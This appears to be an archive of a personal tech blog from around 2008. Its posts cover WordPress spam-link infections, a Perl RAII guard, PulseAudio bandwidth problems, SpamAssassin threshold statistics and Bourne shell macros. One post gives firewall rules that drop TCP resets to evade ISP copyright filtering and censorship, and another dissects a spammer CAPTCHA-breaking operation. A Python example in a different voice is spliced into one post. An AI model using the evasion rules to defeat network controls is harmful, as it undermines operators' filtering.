All of the affected blogs have been hacked to deliver these spam links. They run unpatched versions of WordPress vulnerable to a major security hole. On a casual visit, their pages seem fine -- but "View Source", scroll to the bottom, and there are thousands of spam links for drugs, ringtones, cheap credit, etc. on each one, exactly as above, and as described by Kevin Burton in his description of the current epidemic of blog spam.

How did links to the IIA's blog wind up in this collection?

It's worth noting that the IIA's blog does not display the same symptoms -- the links aren't present on their pages.

However, this post provided a good tip as to what has happened. Those infected blog pages point, in turn, to other infected blogs. Somewhere within the IIA's blog setup, there's a page inserted by a bad guy, collecting thousands of illicit links from thousands of other infected sites -- and sure enough, Irish Web Watcher found it on the IIA's site -- here it is.

Looks like the IIA have a pretty major disinfection job on their hands, and urgently -- there's already a lot of spammy results appearing in the Google index from that site, and the next step after that is usually removal from the index once Google notice it.

Google now include Code Search in normal results

Latest Google curiosity... I hadn't spotted this before: it appears Google is now including 'Code Snippet' results in the results for its normal search. For example, a search for XSLoader gives this result:

[Image: Google search results for XSLoader, including a 'Code Snippet' result]

The results highlighted on the page are for a local variable in a Java module, rather than the much more common XSLoader perl module. I guess 'Code Snippet' search is case-sensitive.

RAII in perl

Suppose you have matching start() and end() functions. You want to ensure that each start() is always matched with its corresponding end(), without having to explicitly pepper your code with calls to that function. Here's a good way to do it in perl -- create a guard object:

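package Scoper;
use strict;
use warnings;

# Constructor: remember the cleanup callback passed in.
sub new {
  my $class = shift; bless({ func => shift },$class);
}
# Runs when the guard object is destroyed: call the cleanup callback.
sub DESTROY {
  my $self = shift; $self->{func}->();
}
1;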

Here's an example of its use:

{
  start();
  my $s = Scoper->new(sub { end(); });
  # [... do something...]
}
# at this point, end() has been called, even if a die() occurred

The idea is simply to use DESTROY to perform whatever the cleanup operation is. Once the $s object goes out of scope, it'll be deleted by perl's GC, which calls $s->DESTROY() in the process. In other words, it's using the GC for its own ends.

Unlike an eval { } block to catch die()s, this will even be called if exit() or POSIX::exit() is called. (POSIX::_exit(), however, skips DESTROY.)

This is a pretty old C++ pattern -- Resource Acquisition Is Initialization. C++'s auto_ptr template class is the best-known example in that language. Here's a perl.com article on its use in perl, from last year, mostly regarding the CPAN module Object::Destroyer. To be honest, though, it's 6 lines of code -- not sure if that warrants a CPAN module! ;)

RAII is used in SpamAssassin, in the Mail::SpamAssassin::Util::ScopedTimer class.

“What’s New” archaeology

jwz has, incredibly, resurrected home.mcom.com, the WWW site of the Mosaic Communications Corporation, as it was circa Oct 1994.

Edmund Roche-Kelly was kind enough to get in touch and note this link -- http://home.mcom.com/home/whatsnew/whats_new_0993.html:

September 3, 1993

IONA Technologies (whose product, Orbix, is the first full and complete implementation of the Object Management Group's Common Object Request Broker Architecture, or CORBA) is now running a Web server.

An online pamphlet on the Church of the SubGenius is now available.

Guess who was responsible for those two ;)

I was, indeed, running the IONA web server -- it was set up in June 1993, and ran Plexus, a HTTP server written in Perl. IONA's server was somewhere around public web server number 70, world-wide.

The SubGenius pamphlet is still intact, btw, although at a more modern, "hyplan"-less URL these days. It'll be 15 years old in 6 months... how time flies!

Sharing, not consuming, news

The New York Times yesterday had a great article about modern news consumption:

According to interviews and recent surveys, younger voters tend to be not just consumers of news and current events but conduits as well — sending out e-mailed links and videos to friends and their social networks. And in turn, they rely on friends and online connections for news to come to them. In essence, they are replacing the professional filter — reading The Washington Post, clicking on CNN.com — with a social one.

“There are lots of times where I’ll read an interesting story online and send the URL to 10 friends,” said Lauren Wolfe, 25, the president of College Democrats of America. “I’d rather read an e-mail from a friend with an attached story than search through a newspaper to find the story.”

[Jane Buckingham, the founder of the Intelligence Group, a market research company] recalled conducting a focus group where one of her subjects, a college student, said, “If the news is that important, it will find me.”

In other words, as Techdirt put it, this generation of news readers now focuses on sharing the news, rather than just consuming it -- and if you want to share a news story, there's no point passing on a subscription-only URL that your friends and contacts cannot read.

What newspapers need to do to remain relevant for this generation of news consumers is not to hide their content behind paywalls and registration-required screens. The Guardian got their heads around this a few years back, and have come along in leaps and bounds since then. I wonder if the Irish Times is listening?

converting TAP output to JUnit-style XML

Here's a perl script that may prove useful: tap-to-junit-xml...

NAME

tap-to-junit-xml - convert perl-style TAP test output to JUnit-style XML

SYNOPSIS

tap-to-junit-xml "test suite name" [ outputprefix ] < tap_output.log

DESCRIPTION

Parse test suite output in TAP (Test Anything Protocol) format, and produce XML output in a similar format to that produced by the <junit> ant task. This is useful for consumption by continuous-integration systems like Hudson.

Written in perl, requires TAP::Parser and XML::Generator. It's based on junit_xml.pl by Matisse Enzer, although pretty much entirely rewritten.

Pulseaudio ate my wifi

I've just spent a rather frustrating morning attempting to debug major performance problems with my home wireless network; one of my machines couldn't associate with the AP at all anymore, and the laptop (which was upstairs in the home office, for a change) was getting horrific, sub-dialup speeds.

I did lots of moving of Linksys APs and tweaking of "txpower" settings, without much in the way of results. Cue tearing hair out etc.

Eventually, I logged into the OpenWRT AP over SSH, ran iftop to see what clients were using the wifi, and saw that right at the top, chewing up all the available bandwidth, was a multicast group called 224.0.0.56. The culprit! There was nothing wrong with the wifi setup after all -- the problem was massive bandwidth consumption, crowding out all other traffic.

You see, "pulseaudio", the new Linux sound server, has a very nifty feature -- streaming of music to any number of listeners, over RTP. This is great. What's not so great is that this seems to have magically turned itself on, and was broadcasting UDP traffic over multicast on my wifi network, which didn't have enough bandwidth to host it.

Here's how to turn this off without killing "pulseaudio". Start "paman", the PulseAudio Manager, and open the "Devices" tab:


Select the "RTP Monitor Stream" in the "Sources" list, and open "Properties":

Hit the "Kill" button, and your network is back to normal. Phew.

Another (quicker) way to do this is to use the command-line "pacmd" tool:

echo kill-source-output 0 | pacmd

It's a mystery where this is coming from, btw. Here's what "paman" says it came from:

But I don't seem to have an active 'module-rtp-send' line in my configuration:

: jm 98...; grep module-rtp-send /etc/pulse/* /home/jm/.pulse*
/etc/pulse/default.pa:#load-module module-rtp-send source=rtp.monitor

Curious. And irritating.

Update: it turns out there's another source of configuration -- GConf. "paprefs" can be used to examine that, and that's where the setting had been set, undoubtedly by me hacking about at some stage. :(

more crap from St. Petersburg

Noted with alarm in this comment regarding the horrific privacy-invading adware that is Phorm:

Their programmers are mostly Saint Petersburg-based, home to the Russian Business Network. Their servers are kept only in Saint Petersburg and China, so no ISP customer data is ever stored in the UK. Any personally identifying information they obtain about UK citizens can never be seen or purged using existing UK Data Protection Laws.

St. Petersburg is turning out to be quite a source of online nastiness -- the new Boca Raton.

Evading Audible Magic’s Copysense filtering

As I noted on Monday, the Irish branches of several major record companies have brought a case against Eircom, demanding in part that the ISP install Audible Magic's Copysense anti-filesharing appliances on their network infrastructure.

I thought I'd do a quick bit of research online into how they do their filtering. Here's what the EFF had to say:

Audible Magic's technology can easily be defeated by using one-time session key encryption (e.g., SSL) or by modifying the behavior of the network stack to ignore RST packets.

It's interesting to see that they used RST packets -- this is the same mechanism used by the "Great Firewall of China" to censor the internet:

the keyword detection is not actually being done in large routers on the borders of the Chinese networks, but in nearby subsidiary machines. When these machines detect the keyword, they do not actually prevent the packet containing the keyword from passing through the main router (this would be horribly complicated to achieve and still allow the router to run at the necessary speed). Instead, these subsidiary machines generate a series of TCP reset packets, which are sent to each end of the connection. When the resets arrive, the end-points assume they are genuine requests from the other end to close the connection — and obey. Hence the censorship occurs.

But there's a very easy way to avoid this, according to that blog post:

However, because the original packets are passed through the firewall unscathed, if both of the endpoints were to completely ignore the firewall’s reset packets, then the connection will proceed unhindered! We’ve done some real experiments on this — and it works just fine!! Think of it as the Harry Potter approach to the Great Firewall — just shut your eyes and walk onto Platform 9¾.

Clayton, Murdoch, and Watson's paper on this technique provides the Linux and FreeBSD firewall commands they used to do this. Here's Linux:

   iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP

For FreeBSD, the command is:

   ipfw add 1000 drop tcp from any to me tcpflags rst in

So assuming Copysense haven't changed their approach yet, it's trivial to block Copysense's filtering, if both ends are running Linux or BSD. I predict if Copysense becomes widespread, someone will patch Windows TCP to do the same.

I love Audible Magic's response:

The current appliance happens to use the TCP Reset to accomplish this today. There are many other technical methods of blocking transfers. Again, we have strategies to deal with them should they ever prove necessary. This is why we recommend our customers purchase a software support agreement which provides for these enhancements that keep their purchase up-to-date and protect their investment.

In other words, "hey customers! if you don't have a support contract, you're shit out of luck when the p2p guys get around our filters!" Nice. ;)

Vim hanging while running VMWare: fixed

I've just fixed a bug on my linux desktop which had been annoying me for a while. Since there seems to be little online written about it, here's a blog post to help future Googlers.

Here's the symptoms: while you're running VMWare, your Vim editing sessions freeze up for 20 seconds or so, roughly every 5 minutes. The editor is entirely hung.

If you strace -p the process ID before the hang occurs, you'll see something like this:

select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
_llseek(7, 4096, [4096], SEEK_SET)      = 0
write(7, "tp\21\0\377\0\0\0\2\0\0\0|\0\0\0\1\0\0\0\1\0\0\0\6\0\0"..., 4096) = 4096
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost -isig -icanon -echo ...}) = 0
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
_llseek(7, 20480, [20480], SEEK_SET)    = 0
write(7, "ad\0\0\245\4\0\0\341\5\0\0\0\20\0\0J\0\0\0\250\17\0\0\247"..., 4096) = 4096
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost -isig -icanon -echo ...}) = 0
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
fsync(

In other words, the hung process is sitting in an fsync() call, attempting to flush changed data for the current file to disk.

Investigation threw up the following: a kerneltrap thread about disk activity, poor responsiveness with Firefox 3.0b3 on linux, and a VIM bug report regarding this feature interfering with laptop-mode and spun-down hard disks.

VMWare must be issuing lots of unsynced I/O, so when Vim issues its fsync() or sync() call, it needs to wait for the VMWare I/O to complete before it can return -- even though the machine is otherwise idle. A bit of a Linux kernel (or specifically, ext3) misfeature, it seems.

Synthesising details from those threads comes up with this fix: edit your ~/.vimrc and add the following lines --

set swapsync=
set nofsync

This will inhibit use of both fsync() and sync() by Vim, and the problem is avoided nicely.

Update: one of the Firefox developers discusses how this affects FF 3.0.

Irish ISPs in record company crosshairs

RTE reports that 4 record companies, EMI, Sony BMG, Universal Music and Warner Music, have brought a High Court action to compel Eircom -- Ireland's largest ISP -- to prevent its networks being used for the illegal downloading of music:

Willie Kavanagh, Managing Director of EMI Ireland and chairman of IRMA, said because of illegal downloading and other factors, the Irish music industry was experiencing a "dramatic and accelerating decline" in income. He said sales in the Irish market dropped 30% in the six years up to 2007.

EMI and the other companies are challenging Eircom's refusal to use filtering technology or other measures to voluntarily block or filter illegally downloaded material. Last October Eircom told the companies it was not in a position to use the filtering software.

(I wonder if those dropping sales in the Irish market comprise only CDs sold by Irish shops? 2001 to 2007 is also the time period when physical sales have given way to online shopping on a gigantic scale, especially for music.)

The Irish Times coverage includes another interesting factoid, which appears in a lot of press regarding this case:

Latest figures available, for 2006, indicate that 20 billion music files were illegally downloaded worldwide that year. The music industry estimates that for every single legal download, there are 20 illegal ones.

A little research reveals that that figure comes from the IFPI Digital Music Report 2008. I'd have a totally different take on it, however. In my opinion, the figure is probably correct, but not for the reasons the IFPI want them to be. There are a number of factors:

There's more commentary on the 20-to-1 figure here.

The IFPI Digital Music Report 2008 also notes:

“2007 was the year ISP responsibility started to become an accepted principle. 2008 must be the year it becomes reality”

Governments are starting to accept that Internet Service Providers (ISPs) should take a far bigger role in protecting music on the internet, but urgent action is needed to translate this into reality, a new report from the international music industry says today.

ISP cooperation, via systematic disconnection of infringers and the use of filtering technologies, is the most effective way copyright theft can be controlled. Independent estimates say up to 80 per cent of ISP traffic comprises distribution of copyright-infringing files.

The IFPI Digital Music Report 2008 points to French President Sarkozy’s November 2007 plan for ISP cooperation in fighting piracy as a groundbreaking example internationally. Momentum is also gathering in the UK, Sweden and Belgium. The report calls for legislative action by the European Union and other governments where existing discussions between the music industry and record companies fail to progress.

So it seems Ireland is the vanguard of an international effort by IFPI members to force ISPs to install filtering, worldwide. It seems the same happened in Belgium last year -- and I reckon there'll be similar cases elsewhere soon.

Either way, I doubt this will be good for Irish internet users.

(PS: while I'm talking about buying MP3s online -- a quick plug for 7digital. Last time I used them, I had a pretty crappy experience, but the situation is a lot better nowadays. They now have a great website that works perfectly in Firefox on Linux; they sell brand new releases like the Hercules and Love Affair album as 320kbps DRM-free MP3s; they support PayPal payments; and downloads are fast and simple -- right click, "Save As". hooray!)

Some other blog coverage: Lex Ferenda with some details about the legal situation, and Jim Carroll.

Update: EMI Ireland seem to be singing from a different hymn-sheet than their head office... interesting.

Update 2: I've taken a look at the Copysense filtering technology, and how it can be evaded.

Announcing IrishPulse

As I previously threatened, I've gone ahead and created a "Microplanet" for Irish twitterers, similar to Portland's Pulse of PDX -- an aggregator of the "stream of consciousness" that comes out of our local Twitter community: IrishPulse.

Here's what you can do:

Add yourself: if you're an Irish Twitter user, follow the user 'irishpulse'. This will add you to the sources list.

Publicise it: feel free to pass on the URL to other Irish Twitter users, and blog about it.

Read it: bookmark and take a look now and again!

In terms of implementation, it's just a (slightly patched) copy of Venus and a perl script using Net::Twitter to generate an OPML file of the Twitter followers. Here's the source. I'd love to see more "Pulse" sites using this...

Google’s CAPTCHA – not entirely broken after all?

A couple of weeks ago, WebSense posted this article with details of a spammer's attack on Google's CAPTCHA puzzle, using web services running on two centralized servers:

[...] It is observed that two separate hosts active on same domain are contacted during the entire process. These two hosts work collaboratively during the CAPTCHA break process. [...]

Why [use 2 hosts]? Because of variations included in the Google CAPTCHA image, chances are that host 1 may fail breaking the code. Hence, the spammers have a backup or second CAPTCHA-learning host 2 that tries to learn and break the CAPTCHA code. However, it is possible that spammers also use these two hosts to check the efficiency and accuracy of both hosts involved in breaking one CAPTCHA code at a time, with the ultimate goal of having a successful CAPTCHA breaking process.

To be specific, host 1 has a similar concept that was used to attack Live mail CAPTCHA. This involved extracting an image from a victim’s machine in the form of a bitmap file, bearing BM.. file headers and breaking the code. Host 2 uses an entirely different concept wherein the CAPTCHA image is broken into segments and then sent as a portable image / graphic file bearing PV..X file headers as requests. [...]

While it doesn't say as such, some have read the post to mean that Google's CAPTCHA has been solved algorithmically. I'm pretty sure this isn't the case. Here's why.

Firstly, the FAQ text that appears on "host 1" (thanks Alex for the improved translation!):

FAQ

If you cannot recognize the image or if it doesn’t load (a black or empty image gets displayed), just press Enter.

Whatever happens, do not enter random characters!!!

If there is a delay in loading images, exit from your account, refresh the page, and log in again.

The system was tested in the following browsers: Internet Explorer, Mozilla Firefox

Before each payment, recognized images are checked by the admin. We pay only for correctly recognized images!!!

Payment is made once per 24 hours. The minimum payment amount is $3. To request payment, send your request to the admin by ICQ. If the admin is free, your request will be processed within 10-15 minutes, and if he is busy, it will be processed as soon as possible.

If you have any problems (questions), ICQ the admin.

That reads to me a lot like instructions to human "CAPTCHA farmers", working as a distributed team via a web interface.

Secondly, take a look at the timestamps in this packet trace:

The interesting point is that there's a 40-second gap between the invocation on "Captcha breaking host 1" and the invocation on "Captcha breaking host 2". There is then a short gap of 5 seconds before the invocations occur on the Gmail websites.

Here's my theory: "host 1" is a web service gateway, proxying for a farm of human CAPTCHA solvers. "host 2", however, is an algorithm-driven server, with no humans involved. A human may take 40 seconds to solve a CAPTCHA, but pure code should be a lot speedier.

Interesting to note that they're running both systems in parallel, on the same data. By doing this, the attackers can

  1. collect training data for a machine-learning algorithm (this is implied by the 'do not enter random characters!' warning from the FAQ -- they don't want useless training data)

  2. collect test cases for test-driven development of improvements to the algorithm

  3. measure success/failure rates of their algorithms, "live", as the attack progresses

Worth noting this, too:

Observation*: On average, only 1 in every 5 CAPTCHA breaking requests are successfully including both algorithms used by the bot, approximating a success rate of 20%. The second algorithm (segmentation) has very poor performance that sometimes totally fails and returns garbage or incorrect answers.

So their algorithm is unreliable, and hasn't yet caught up with the human farmers. Good news for Google -- and for the CAPTCHA farmers of Romania ;)

Update: here's the NYTimes' take, with broadly agreeing comments from Brad Taylor of Google. (The Register coverage is off-base, however.)

On the effects of lowering your SpamAssassin threshold

So I was chatting to Danny O'Brien a few days ago. He noted that he'd reduced his SpamAssassin "this is spam" threshold from the default 5.0 points to 3.7, and was wondering what that meant:

I know what it means in raw technical terms -- spamassassin now marks anything >3.7 as spam, as opposed to the default of five. But given the genetic algorithm way that SA calculates the rule scoring, what does lowering the score mean? That I'm more confident that stuff marked ham is stuffed marked ham than the average person? That my bayesian scoring is now really good?

Do people usually do this without harmful side-effects? What does it mean about them if they do it?

Does it make me a good person? Will I smell of ham? These are the things that keep me awake at night.

It's a good question! Here's what I responded with -- it occurs to me that this is probably quite widely speculated about, so let's blog it here, too.

As you tweak the threshold, it gets more or less aggressive.

By default, we target a false positive rate of less than 0.1% -- that means 1 FP, a ham marked as spam incorrectly, per 1000 ham messages. Last time the scores were generated, we ran our usual accuracy estimation tests, and got a false positive rate of 0.06% (1 in 1667 hams) and a false negative rate of 1.49% (1 in 67 spams) for the default threshold of 5.0 points. That's assuming you're using network tests (you should be) and have Bayes training (this is generally the case after running for a few weeks with autolearning on).

If you lower the threshold, then, that trades off the false negatives (reducing them -- less spam getting past) in exchange for more false positives (hams getting caught). In those tests, here's some figures for other thresholds:

SUMMARY for threshold 3.0: False positives: 290 0.43% False negatives: 313 0.26%

SUMMARY for threshold 4.0: False positives: 104 0.15% False negatives: 1084 0.91%

SUMMARY for threshold 4.5: False positives: 68 0.10% False negatives: 1345 1.13%

so you can see FPs rise quite quickly as the threshold drops. At 4.0 points, the nearest to 3.7, 1 in 666 ham messages (0.15%) will be marked incorrectly as spam. That's nearly 3 times as many FPs as the default setting's value (0.06%). On the other hand, only 1 in 109 spams will be mis-filed.

Here's the reports from the last release, with all those figures for different thresholds -- should be useful for figuring out the likelihoods!

In fact, let's get some graphs from that report. Here is a graph of false positives (in orange) vs false negatives (in blue) as the threshold changes...

and, to illustrate the details a little better, zoom in to the area between 0% and 1%...

You can see that the default threshold of 5.0 isn't where the FP% and FN% rates meet; instead, it's got a much lower FP% rate than FN%. This is because we consider FPs to be much more dangerous than missed spams, so we try to avoid them to a higher degree.

An alternative, more standardized way to display this info is as a Receiver Operating Characteristic curve, which is basically a plot of the true positive rate vs false positives, on a scale from 0 to 1.

Here's the SpamAssassin ROC curve:

More usefully, here's the ROC curve zoomed in nearer the "perfect accuracy" top-left corner:

Unfortunately, this type of graph isn't much use for picking a SpamAssassin threshold. GNUplot doesn't allow individual points to be marked with the value from a certain column, otherwise this would be much more useful, since we'd be able to tell which threshold value corresponds to each point. C'est la vie!

Update: this is possible with GNUplot 4.2 onwards, it seems. Great news! Hat tip to Philipp K Janert for the advice. Here are updated graphs using this feature:

(GNUplot commands to render these graphs are here.)

Update again: much better interactive Flash graphs here.
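The threshold trade-off from this post, as an added example (not SpamAssassin's own accuracy-test tooling): it sweeps thresholds over a labelled set of scores, prints SUMMARY lines in the format quoted above, labels each ROC point with its threshold, and picks the lowest threshold that stays within a false-positive target. The scores are constructed, and the sketch assumes a message is flagged when its score is at or above the threshold.

```python
# Constructed sample corpus of SpamAssassin scores (not real mail).
HAM_SCORES = [-2.1, -1.0, 0.0, 0.3, 0.8, 1.2, 1.9, 2.6, 3.4, 4.2]
SPAM_SCORES = [2.8, 3.8, 4.4, 4.8, 5.6, 7.1, 9.3, 12.0, 15.5, 21.7]
THRESHOLDS = [3.0, 4.0, 4.5, 5.0]


def sweep(ham, spam, thresholds):
    """Count false positives/negatives at each threshold.

    FP rate is relative to the ham count and FN rate to the spam count,
    matching the "1 in N hams" / "1 in N spams" reading used in the post.
    Assumption: score >= threshold means "marked as spam".
    """
    rows = []
    for t in thresholds:
        fp = sum(1 for s in ham if s >= t)      # ham wrongly flagged
        fn = sum(1 for s in spam if s < t)      # spam that got through
        rows.append({
            "threshold": t,
            "fp": fp,
            "fn": fn,
            "fp_rate": fp / len(ham),
            "fn_rate": fn / len(spam),
            "tp_rate": (len(spam) - fn) / len(spam),
        })
    return rows


def summary_line(row):
    """Render one row in the same shape as the SUMMARY lines above."""
    return ("SUMMARY for threshold %.1f: False positives: %d %.2f%% "
            "False negatives: %d %.2f%%" % (
                row["threshold"], row["fp"], row["fp_rate"] * 100,
                row["fn"], row["fn_rate"] * 100))


def roc_points(rows):
    """(false positive rate, true positive rate, threshold) per point,
    so each point on the ROC curve can be labelled with its threshold."""
    return [(r["fp_rate"], r["tp_rate"], r["threshold"]) for r in rows]


def lowest_threshold_within(rows, max_fp_rate):
    """Most aggressive threshold whose FP rate stays within the target."""
    ok = [r["threshold"] for r in rows if r["fp_rate"] <= max_fp_rate]
    return min(ok) if ok else None


if __name__ == "__main__":
    rows = sweep(HAM_SCORES, SPAM_SCORES, THRESHOLDS)
    for row in rows:
        print(summary_line(row))
    for fpr, tpr, t in roc_points(rows):
        print("ROC point fpr=%.2f tpr=%.2f threshold=%.1f" % (fpr, tpr, t))
    print("lowest threshold with FP rate <= 10%:",
          lowest_threshold_within(rows, 0.10))
```

On a real corpus the input would be the per-message scores from your own hand-classified ham and spam, which is what makes the chosen threshold meaningful for your mail rather than the project's test set.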

Microplanets

Intriguing! Via Glynn Moody comes an interesting new site, Pulse of Open Source:

To highlight open source activity on Twitter, I have launched a new web application today called The Pulse of Open Source. This is the stream of collective consciousness from the open source community on Twitter. You can follow this stream by simply bookmarking the site and visiting regularly or by adding the RSS feed to your feed reader. You can also create a Twitter account and add the individuals you’d like to follow to your own Twitter friends list if you’d prefer. There is also a mobile version of the site for on-the-go viewing.

I'm not entirely convinced it makes sense -- the "open source community" is a pretty wide and amorphous concept, covering "enterprisey" types like Iona, to conference organisers, to web standards guys to GNOME developers. That's a wide range.

However, that site links to the original, and a version which resonates better: PulseOfPDX.com, 'the stream of Portland's collective consciousness'. Basically, this is a local syndication site, with microblogging from a community of local Twitterers. Similar to the "Planet" concept, which aggregates posts from multiple weblogs into a new 'river of news' combined feed, as seen on Planet Antispam, Planet Perl, Planet.journals.ie, but for off-the-cuff Twitter microblog comments. It's a microplanet, to coin a phrase.

I think I might set up one of these for Ireland... what a great idea!

Update: Ted Leung posted about this today as well, I see, linking to this call for an "out-of-the-box" Twitter aggregator:

In theory, this whole pulse idea could be packaged up to be as easily deployable as “planet” sites. Here, “pulse” is the operational brand-name of aggregating Twitter accounts, where as “planet” is the tried and true operational brand-name of aggregating blogs.

I think I still prefer "microplanet" ;)

Update 2: check out IrishPulse!

Plug plug

It's been a while since I've posted about good shopping experiences I've had. Here's a couple:

SoleTrader.co.uk: I'm a terrible shopper. I hate shops, I always wind up having to visit them at their busiest times on the weekend, and the last time I tried to go shopping for a new pair of shoes, I got caught in torrential rain, fell over and broke my thumb instead. seriously. So feck that.

Instead, I resolved to buy them online, and that I did -- from SoleTrader. They had a great range of trainers, I found what I was after, the price was grand, and delivery on time. Shoes are always the same size -- their sizes are standardised, after all -- so naturally they fit fine. All in all, it worked out great.

Be Organic: these guys operate in North Dublin, delivering bags of organic fruit and vegetables to your door, weekly. We get the Essential Fruit Bag and the Mini Box, with a bi-weekly bag of spuds on top, for EUR 32 per week. The quality of the food is absolutely fantastic, there's never any spoilage or wilting, and it's always fresh and delicious. Compared to supermarket fare, it's leagues ahead. They've also been grand and flexible when we need to tweak the order slightly -- for example we have a veto on celery, and that's not an issue at all. The only problem would be that they've recently increased their prices... but unfortunately that seems to be a general problem in Ireland these days!

vote for Dustin on Saturday

A friend of a friend writes:

Unless you are pretty good at avoiding the media, you will be aware that Dustin the Turkey has been chosen as one of six finalists for RTE's Eurosong, the winner of which will go on to represent Ireland in the Eurovision Song Contest in Serbia in May.

What you may not be aware of is that I wrote and recorded the song with him and need your votes to help get me to Serbia!!!

The TV show will be broadcast live on RTE this Saturday Feb 23rd, at 7pm. It is a televote (a la X-factor format), so get your mobile phones ready. The results are at 9:45pm.

The song, Irlande Douze Points, is a parody on the current types of songs, acts and block-voting in the Eurovision. It may make your ears bleed a bit, you may ask yourself why, but what the hell, send someone you know to the final!!!

Apparently, Dustin urges the contest judges to "give douze points to Ireland, for its lowlands and its highlands, for Terry Wogan's wig and Bono's leather pants. We brought you Guinness and Westlife, 800-years of war and strife, but we all apologise for Riverdance."

Check out the outraged reactions from Ireland's past Eurovision "winners":

Frank McNamara, who wrote two of the Irish Eurovision winners, asked whether RTE, the state broadcaster that selected the six acts, was “giving two fingers” to Irish 'song'writers. “I think it is absolutely disgraceful."

Shay Healy, who wrote Johnny Logan’s Eurovision hit What’s Another Year?, wondered “how any bunch of grown-ups could come up with this as a solution”

Phil Coulter thought that Eurovision was going “down the tubes”.

The choice on Saturday is between a turkey puppet taking the piss in a Northside accent, and such po-faced "serious pop" mawkfests as '"Double Cross My Heart" performed by Donal Skehan' and '"Time to Rise" performed by Maya'. snore. You know it's got to be the turkey.

Here's the official Bebo page, and the Facebook group -- and here's the song itself:

Update: actually, here's another, higher quality clip -- with an entirely different song! Let's hope this is the one...

Update 2: he won. Dana and the other professional Eurovision types have been chewing wasps, it's hilarious!

A historical DailyWTF moment

Today, in work, we wound up discussing this classic DailyWTF.com article -- "Remember, the enterprisocity of an application is directly proportionate to the number of constants defined":

public class SqlWords
{
  public const string SELECT = " SELECT ";
  public const string TOP = " TOP ";
  public const string DISTINCT = " DISTINCT ";
  /* etc. */
}

public class SqlQueries
{
  public const string SELECT_ACTIVE_PRODCUTS =
    SqlWords.SELECT +
    SqlWords.STAR +
    SqlWords.FROM +
    SqlTables.PRODUCTS +
    SqlWords.WHERE +
    SqlColumns.PRODUCTS_ISACTIVE +
    SqlWords.EQUALS +
    SqlMisc.NUMBERS_ONE;
  /* etc. */
}

This made me recall the legendary source code for the original Bourne shell, in Version 7 Unix. As this article notes:

Steve Bourne, at Bell Labs, worked on his version of shell starting from 1974 and this shell was released in 1978 as Bourne shell. Steve previously was involved with the development of Algol-68 compiler and he transferred general approach and some syntax sugar to his new project.

"Some syntax sugar" is an understatement. Here's an example, from cmd.c:

LOCAL REGPTR    syncase(esym)
        REG INT esym;
{
        skipnl();
        IF wdval==esym
        THEN    return(0);
        ELSE    REG REGPTR      r=getstak(REGTYPE);
                r->regptr=0;
                LOOP wdarg->argnxt=r->regptr;
                     r->regptr=wdarg;
                     IF wdval ORF ( word()!=')' ANDF wdval!='|' )
                     THEN synbad();
                     FI
                     IF wdval=='|'
                     THEN word();
                     ELSE break;
                     FI
                POOL
                r->regcom=cmd(0,NLFLG|MTFLG);
                IF wdval==ECSYM
                THEN    r->regnxt=syncase(esym);
                ELSE    chksym(esym);
                        r->regnxt=0;
                FI
                return(r);
        FI
}

Here are the #define macros Bourne used to "Algolify" the C compiler, in mac.h:

/*
 *      UNIX shell
 *
 *      S. R. Bourne
 *      Bell Telephone Laboratories
 *
 */

#define LOCAL   static
#define PROC    extern
#define TYPE    typedef
#define STRUCT  TYPE struct
#define UNION   TYPE union
#define REG     register

#define IF      if(
#define THEN    ){
#define ELSE    } else {
#define ELIF    } else if (
#define FI      ;}

#define BEGIN   {
#define END     }
#define SWITCH  switch(
#define IN      ){
#define ENDSW   }
#define FOR     for(
#define WHILE   while(
#define DO      ){
#define OD      ;}
#define REP     do{
#define PER     }while(
#define DONE    );
#define LOOP    for(;;){
#define POOL    }


#define SKIP    ;
#define DIV     /
#define REM     %
#define NEQ     ^
#define ANDF    &&
#define ORF     ||

#define TRUE    (-1)
#define FALSE   0
#define LOBYTE  0377
#define STRIP   0177
#define QUOTE   0200

#define EOF     0
#define NL      '\n'
#define SP      ' '
#define LQ      '`'
#define RQ      '\''
#define MINUS   '-'
#define COLON   ':'

#define MAX(a,b)        ((a)>(b)?(a):(b))

Having said all that, the Bourne shell was an awesome achievement; many of the coding constructs we still use in modern Bash scripts, 30 years later, are identical to the original design.

Technorati bloginfo API weirdness

For the benefit of other Technorati API users...

In a comment on this entry, Padraig Brady mentioned that his blog had mysteriously disappeared from the Irish Blogs Top 100 list.

I investigated, and found something odd -- it seems Technorati has made a change to their bloginfo API, now listing weblogs with their 'rank', but without some of the important metadata, like 'inboundblogs', 'inboundlinks', and with a 'lastupdate' time set to the epoch (1970-01-01 00:00:00 GMT), in the API. Here's an example:

<!-- generator="Technorati API version 1.0" -->
<!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN"
                 "http://api.technorati.com/dtd/tapi-002.xml">
<tapi version="1.0">
<document>
    <result>
        <url>http://www.pixelbeat.org</url>
                    <weblog>
                <name>Pádraig Brady</name>
                <url>http://www.pixelbeat.org</url>
                <rssurl></rssurl>
                <atomurl></atomurl>
                <inboundblogs></inboundblogs>
                <inboundlinks></inboundlinks>
                <lastupdate>1970-01-01 00:00:00 GMT</lastupdate>
                <rank>74830</rank>
            </weblog>
                            </result>
</document>
</tapi>

Compare that with this lookup result, on my own blog:

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Technorati API version 1.0" -->
<!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN"
                 "http://api.technorati.com/dtd/tapi-002.xml">
<tapi version="1.0">
<document>
    <result>
        <url>http://taint.org</url>
                    <weblog>
                <name>taint.org: Justin Mason’s Weblog</name>
                <url>http://taint.org</url>
                <rssurl>http://taint.org/feed</rssurl>
                <atomurl>http://taint.org/feed/atom</atomurl>
                <inboundblogs>143</inboundblogs>
                <inboundlinks>227</inboundlinks>
                <lastupdate>2008-02-12 11:48:10 GMT</lastupdate>
                <rank>43404</rank>
            </weblog>
                            <inboundblogs>143</inboundblogs>
                            <inboundlinks>227</inboundlinks>
            </result>
</document>
</tapi>

